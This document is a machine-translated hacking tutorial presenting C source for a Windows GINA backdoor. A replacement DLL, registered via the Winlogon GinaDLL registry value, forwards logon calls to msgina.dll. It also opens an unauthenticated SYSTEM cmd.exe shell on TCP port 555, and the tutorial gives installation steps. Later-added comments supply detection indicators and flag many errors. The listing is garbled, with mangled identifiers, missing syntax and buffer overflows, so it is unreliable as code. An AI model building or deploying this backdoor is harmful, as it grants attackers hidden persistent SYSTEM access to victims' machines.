GINA backdoor: a simple implementation
Written by: liond8
Email: liond8@126.com
Website: http://liond8.126.com
This was originally a manuscript submitted to Black Defense, but I have had no news for 3 months, so I am not waiting any longer. Although this is not deep technology, it should still be helpful for beginners. Experts, please go easy on me.
First, a word on the role of GINA in Windows. NT, 2K, etc. are multi-user systems, and there is an authentication step before the user reaches the shell. This verification is done by GINA. Besides verifying the user's identity, GINA provides the graphical logon interface. The default GINA is Msgina.dll, which you can find in the system32 directory under the system directory. In addition to the default GINA, Windows allows a custom-developed GINA to replace Msgina.dll in order to implement its own authentication methods. This is what makes our back door possible. Replacing the default msgina.dll is easy: just edit the registry. Under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon key, add a value of type REG_SZ named GinaDLL, whose data is the filename of the GINA DLL that replaces it.
E.g:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"GinaDLL" = "ginadll.dll" (ginadll.dll is the GINA used as the replacement)
Our own DLL is only a shell: apart from the back door, everything is passed straight through to Msgina.dll. Put bluntly, we install an intermediate layer and use it to implement the back door. GINA is loaded into the Winlogon process. Winlogon is the system's user-interaction logon process and runs with SYSTEM privileges, so our back door also has SYSTEM privileges. This is better for the back door.
Since we have to replace all 15 GINA functions, writing them all out would be quite long. We will pick a few of the important ones to demonstrate. The others simply call down to Msgina.dll in the same way. For details, please refer to the full source code.
// Function-pointer types for the exported GINA entry points of the genuine
// msgina.dll. The wrapper DLL resolves each one with GetProcAddress and
// forwards the call, so the stock logon behaviour is preserved and the
// replacement is invisible to the user at the logon screen.
// NOTE(review): this listing is machine-translated and case-mangled; the
// identifiers and punctuation below do not match the Win32 API as printed.
// Read it as a description of the technique, not as compilable code.
Typedef Bool (WinApi * Pfuncwlxnegotiate) (DWORD, DWORD *);
Typedef Bool (WinApi * PfuncwlxInitialize) (LPWSTR, HANDLE, PVOID, PVOID, PVOID *);
Typedef void (WinApi * pfuncwlxdisplaysasasnetice) (PVOID);
TypedEf Int (WinApi * PfuncWlxLoggedoutSAS) (PVOID, DWORD, PLUID, PSID, PDWORD, PHANDLE, PWLX_MPR_NOTIFY_INFO, PVOID *);
Typedef Bool (WinApi * PfuncwlxactivateUsershell) (PVOID, PWSTR, PWSTR, PVOID);
Typedef Int (WinAPI * PfuncWlxLoggedonsas) (PVOID, DWORD, PVOID);
Typedef void (WinAPI * PfuncwlxDisPlayLockedNotice) (PVOID);
TypedEf Int (WinApi * PfuncwlxwkstalockedSas) (PVOID, DWORD);
Typedef Bool (WinAPI * Pfuncwlxislockok) (PVOID);
TypeDef Bool (WinApi * PfuncwlxisLogoffok) (PVOID);
TypedEf void (WinAPI * PFuncWlxLogoff) (PVOID); TypeDef Void (WinApi * PfuncwlxShutdown) (PVOID, DWORD);
Typedef Bool (WinApi * PfuncwlxScreensaverNotify) (PVOID, BOOL *);
TypedEf Bool (WinApi * PfuncwlxStartApplication) (PVOID, PWSTR, PVOID, PWSTR);
TypedEf Bool (WinAPI * PFUNCWLXNETWORKPROVIDERLOAD) (PVOID, PWLX_MPR_NOTIFY_INFO);
Global variables used by the back door
// Pipe handles shared between the Backdoor, Recvthread and Sendthread
// threads. hsread/hstdout is the pipe that carries cmd.exe's output
// (hstdout becomes the child's stdout/stderr, hsread is read by Sendthread);
// hstdinput/hswrite carries its input (hstdinput becomes the child's stdin,
// hswrite is written by Recvthread). None of this state is synchronised.
Handle hstdout = null, hsread = NULL;
Handle hstdinput = null, hswrite = NULL;
// Exit flag: set by Recvthread, polled by both Recvthread and Sendthread,
// and reset by STARTINIT after the Backdoor thread finishes. It is a plain
// global written from one thread and read from others, with no memory
// barrier or interlocked access.
Bool bexit = false;
// Process handle of the cmd.exe child created by Backdoor; Recvthread
// terminates it when the connection drops.
Handle HProcess = NULL;
// WlxNegotiate: Winlogon calls this first to learn which Winlogon interface
// version the GINA supports. The wrapper loads the genuine msgina.dll,
// resolves the real export and forwards the call unchanged, so version
// negotiation behaves exactly as with the stock GINA.
// NOTE(review): the module handle from LoadLibrary is never released here
// (no FreeLibrary); every forwarding function below repeats this pattern.
Bool WinAPI WLXNEGOTIAT (DWORD DWINLOGONVERSION, DWORD * PDWDLVERSION)
{
Hinstance HDLL = NULL;
IF (! (hdll = loadinglibrary ("msgina.dll"))))))))))
Return False;
// Resolve the real WlxNegotiate export in msgina.dll
Pfuncwlxnegotiate PWLXnegotiate = (Pfuncwlxnegotiate) GetProcaddress (HDLL, "WLXnegotiate");
IF (! PWLXNEGOTIATE)
Return False;
// Forward to the genuine implementation and return its answer
Return PWLXNEGOTIATE (DWWINLOGONVERSION, PDWDLVERSION);
}
// WlxInitialize: called by Winlogon once per window station to initialise
// the GINA. The wrapper forwards to msgina.dll, but first initialises
// Winsock 2.2 inside winlogon.exe.
// Defender note: a stock winlogon.exe has no reason to load ws2_32.dll and
// call WSAStartup at GINA-initialisation time; Winsock activity in that
// process is an indicator worth alerting on.
Bool WinAPI WLXInitialize (LPWSTR LPWINSTA, HANDLE HWLX,
PVOID PVRESERVED, PVOID PWINLOGONFUNCTIONS, PVOID * PWLXCONTEXT)
{
Hinstance HDLL = NULL;
IF (! (hdll = loadinglibrary ("msgina.dll"))))))))))
Return False;
PfuncwlxInitialize Pwlxinitialize = (PFuncwlxInitialize) GetProcaddress (HDLL, "WLXInitialize);
IF (! PWLXInitialize)
Return False;
// Initialise Winsock (ws2_32.dll) in the Winlogon process so that the
// listener thread started later can create sockets
Wsadata wsadata;
IF (WsaStartup (MakeWord (2, 2), & WSADATA)! = 0)
Return False;
// Forward to the genuine WlxInitialize
Return PWLXInitialize (LPwinsta, HWLX, PVRESERVED, PWINLOGONFUNCTIONS,
PWLXCONTEXT);
}
// WlxLoggedOutSAS: Winlogon calls this when a secure attention sequence
// (Ctrl+Alt+Del) arrives while no user is logged on. This is the point where
// the back door is armed: a STARTINIT listener thread is created and then
// the call is forwarded to msgina.dll so the normal logon dialog appears.
// NOTE(review): the mutex is created, acquired and released within this one
// call and is unnamed, so it serialises nothing against other threads.
// NOTE(review): a new STARTINIT thread is started on every logged-out SAS;
// presumably later instances fail their bind on the already-used port and
// exit (see STARTINIT), but nothing here prevents the repeated attempts.
Int WinAPI WLXLoggedoutsas (PVOID PWLXCONText, DWORD DWSASTYPE, PLUID PAUThenticationId, Psid Plogonsid, Pdword PdwOptions,
Phandle PHTOKEN, PWLX_MPR_NOTIFY_INFO PMPRNOTIFYINFO,
Pvoid * pprofile)
{
Hinstance HDLL = NULL;
IF (! (hdll = loadinglibrary ("msgina.dll"))))))))))
Return False;
PfuncwlxLoggedoutSas PWLXLoggedoutSas = (PFuncWlxLoggedoutSas) GetProcaddress (HDLL, "WLXLoggedoutSas);
IF (! PWLXLoggedoutSas)
Return False;
Handle Hmutex = Createmutex (NULL, FALSE, NULL); // unnamed, per-call mutex
WaitforsingleObject (hmutex, infinite);
// Start the listener thread; it runs in winlogon.exe with its token
CreateThread (NULL, NULL, STARTINIT, NULL, NULL, NULL);
ReleaseMutex (HMUTEX);
CloseHandle (hmutex);
// Forward to the genuine WlxLoggedOutSAS so the logon dialog is unchanged
int RET = PWLXLoggedoutSas (PWLXContext, DWSASTYPE, PAUThenticationID, PLOGONSID, PDWOPTIONS, PHTOKEN, PMPRNOTIFYINFO, PPROFILE);
Return Ret;
}
// STARTINIT: listener thread. Binds a TCP socket to port 555 on all
// interfaces (INADDR_ANY), listens with a backlog of 1, and for each
// accepted connection runs a Backdoor thread, waiting for it to finish
// before accepting the next. Connections are therefore served one at a
// time; the accept loop never exits.
// Defender note: winlogon.exe owning a listening TCP socket is a strong
// indicator; the port is fixed in this listing but is trivially changed,
// so detect on the listening process rather than the port number.
// NOTE(review): as printed, the bind call below omits the socket argument
// and `Socket Sock = NULL` does not match INVALID_SOCKET conventions; the
// listing is garbled and is not compilable as-is.
DWORD WINAPI STARTINIT (PVOID LP)
{
Socket Sock = NULL;
// Create a TCP socket
SOCK = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
SockAddr_in addr_in = {0};
Addr_in.sin_family = af_INet;
Addr_in.sin_port = htons (555); // listening port as printed in this listing
Addr_in.sin_addr.s_un.s_addr = HTONL (INADDR_Any);
// Bind to port 555 on every interface; give up if the port is in use
IF (Bind (SockAddr *) & addr_in, sizeof (sockaddr)) == Socket_ERROR)
Return 1;
// Listen with a backlog of one pending connection
Listen (SOCK, 1);
SockAddr_in sin = {0};
Int size = sizeof (sin);
While (True)
{
// Accept one connection; on failure back off for a second and retry.
// After a connection ends the loop returns here for the next one.
Socket Recvsock = Accept (Sock, (SockAddr *) & sin, & size);
IF (Recvsock == Invalid_socket) {
Sleep (1000);
CONTINUE;
}
Handle Hmutex = Createmutex (NULL, FALSE, NULL); // unnamed, per-iteration mutex
WaitforsingleObject (hmutex, infinite);
// Hand the accepted socket to a Backdoor thread (pointer to a local,
// which stays valid only because this thread blocks until Backdoor ends)
Handle Hthread = CreateThread (Null, Null, Backdoor, & Recvsock, 0, NULL); ReleaseMutex (HMutex);
CloseHandle (hmutex);
// Block until the Backdoor thread has finished with this connection
WaitforsingleObject (hthread, infinite);
Bexit = false;
}
Return 1;
}
// Backdoor: per-connection thread. Creates two inheritable anonymous pipes,
// spawns a hidden cmd.exe from the system directory with its stdin/stdout/
// stderr redirected to those pipes, then runs Recvthread (socket -> cmd
// stdin) and Sendthread (cmd stdout -> socket) until both finish.
// No authentication of the peer is performed: whoever reaches the port gets
// the shell, running under winlogon.exe's SYSTEM token. (The original
// author notes one could add password checking here.)
// Defender note: a cmd.exe child of winlogon.exe with a hidden window and
// redirected standard handles is the process-tree indicator for this.
// NOTE(review): `Sock`, `Proin`/`procor` and the missing `;` after the
// hstderr assignment are inconsistent as printed; LP presumably points at
// the accepted socket handed over by STARTINIT. The strcat calls into the
// MAX_PATH buffer are unbounded.
DWORD WINAPI Backdoor (LPVOID LP)
{
// No password or peer check is made before the shell is attached.
// Mark the pipe handles inheritable so the child process can use them
Security_attributes sa;
Sa.binherithandle = true;
Sa.nlength = SizeOf (SA);
Sa.lpsecurityDescriptor = null;
// Output pipe (child writes Hstdout, Sendthread reads HSRead) and
// input pipe (child reads HSTDINPUT, Recvthread writes HSWRITE)
CreatePipe (& HSRead, & Hstdout, & Sa, 0);
CreatePipe (& HSTDINPUT, & HSWRITE, & SA, 0);
STARTUPINFO STARTINFOR = {0};
Process_information proinfor = {0};
// Hide the console window and redirect the child's standard handles to the pipes
STARTINFOR.CB = SizeOf (StartupInfo);
STARTINFOR.WSHOWINDOW = SW_HIDE;
STARTINFOR.DWFLAGS = Startf_useshowWindow | Startf_usestdhandles;
STARTINFOR.HSTDOUTPUT = Startinfor.hstderRr = HSTDOUT
STARTINFOR.HSTDINPUT = HSTDINPUT;
// Build the full path of cmd.exe under the system directory
TCHAR SYSDIR [MAX_PATH] = {0};
GetSystemDirectory (sysdir, max_path);
IF (sysdir [strlen (sysdir) -1]! = '//')
STRCAT (sysdir, "//");
STRCAT (SYSDIR, "cmd.exe");
Handle Hmutex = Createmutex (NULL, FALSE, NULL); // unnamed, per-call mutex
WaitforsingleObject (hmutex, infinite);
// Spawn cmd.exe with handle inheritance enabled; it inherits winlogon's token
CreateProcess (NULL, SYSDIR, NULL, NULL, TRUE, NULL, NULL, NULL, & StartInfor, & Proin)
HPROCESS = procor.hprocess;
// The parent keeps only HSRead/HSWRITE; the child-side ends are closed here
CloseHandle (HSTDOUT);
CloseHandle (HSTDINPUT);
Handle Harray [2] = {0};
// One thread forwards received bytes to cmd's stdin, the other relays its output
Harray [0] = CreateThread (Null, Null, Recvthread, & Sock, Null, NULL);
Harray [1] = CreateThread (Null, Null, Sendthread, & Sock, NULL, NULL);
ReleaseMutex (HMUTEX);
CloseHandle (hmutex);
// Wait for both relay threads, then drop the connection
WaitFormultipleObjects (2, Harray, True, Infinite); CloseSocket (SOCK);
Return 1;
}
// Recvthread: reads the connection one byte at a time, echoes each byte
// back to the peer, and accumulates a line in CMDBUF. On a newline the line
// is written to cmd.exe's stdin; if its first four characters match "EXIT"
// (case-insensitive) the shared exit flag is raised. If recv() returns
// anything other than 1 (peer closed or error) the flag is raised and the
// cmd.exe child is terminated.
// NOTE(review): bytes are strcat'ed into the 512-byte CMDBUF with no length
// check, so a line longer than the buffer overruns it. The inner `int RET`
// shadows the outer one, and `Num ;` on its own is a no-op as printed.
// NOTE(review): after recv() fails the loop does not return; it keeps
// spinning until the next iteration observes Bexit.
DWORD WINAPI Recvthread (LPVOID LP)
{
Socket SOCK = * (Socket *) LP;
TCHAR CMDBUF [512] = {0}; // accumulates the current command line
INT NUM = 0;
While (True)
{
IF (Bexit == True)
Return 1;
TCHAR TBUF [2] = {0};
int RET = Recv (SOCK, TBUF, 1, 0); // read a single byte
IF (RET == 1)
{
Num ; // count of bytes in the current line (no-op as printed)
STRCAT (CMDBUF, TBUF); // append to the line buffer (unbounded)
Send (SOCK, TBUF, 1, 0); // echo the byte back to the peer
IF (TBUF [0] == '/ n') // end of line: hand the command to cmd.exe
{
TCHAR BUF [5] = {0};
DWORD A = 0;
// Write the line into the pipe feeding cmd.exe's stdin
Writefile (HSWRITE, CMDBUF, NUM, & A, NULL);
Memcpy (BUF, CMDBUF, 4);
// An "exit" command also ends the relay threads
int RET = _StriCMP (BUF, "EXIT");
IF (RET == 0)
BEXIT = True;
MEMSET (CMDBUF, 0, 512);
Num = 0;
}
}
Else
{
// Connection dropped or recv failed: stop the relay and kill cmd.exe
BEXIT = True;
DWORD A = 0;
GetExitcodeProcess (HProcess, & A);
TerminateProcess (HProcess, A);
}
}
Return 1;
}
// Sendthread: polls the pipe attached to cmd.exe's stdout every 100 ms with
// PeekNamedPipe; when data is available it reads up to 512 bytes and sends
// them to the peer. Exits when the shared exit flag is set.
// NOTE(review): PeekNamedPipe is given BUF as well, so the peek already
// copies up to 512 bytes before ReadFile reads them again; only the
// ReadFile result is sent. The thread never terminates on a send() failure.
DWORD WINAPI Sendthread (LPVOID LP)
{
Socket SOCK = * (Socket *) LP;
TCHAR BUF [512] = {0};
DWord readsize = 0;
While (True)
{
If (bexit == true) // exit flag set by Recvthread
Return 1;
// Check whether cmd.exe has produced output without blocking
PeeknamedPipe (HSread, BUF, 512, & Readsize, Null, NULL);
// Data available: consume it; otherwise sleep and poll again
IF (readsize> 0)
Readfile (HSREAD, BUF, 512, & Readsize, NULL);
Else
{
Sleep (100);
CONTINUE;
}
// Relay the output to the peer and clear the buffer
Send (Sock, Buf, Readsize, 0);
MEMSET (BUF, 0, 512);
}
Return 1;
}
The above is basically the core part of the back door; all 15 functions are wrapped so that each calls down to the corresponding one of the 15 functions of the original DLL. Place your own DLL in the system directory and add the registry value described above, and the back door is installed. Since we are replacing a DLL, a reboot is required for it to take effect; that is also a drawback. Removing the back door is just as simple: delete the registry value we added. Because this replaces a system DLL, please proceed carefully; otherwise the system will not start properly.
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = ==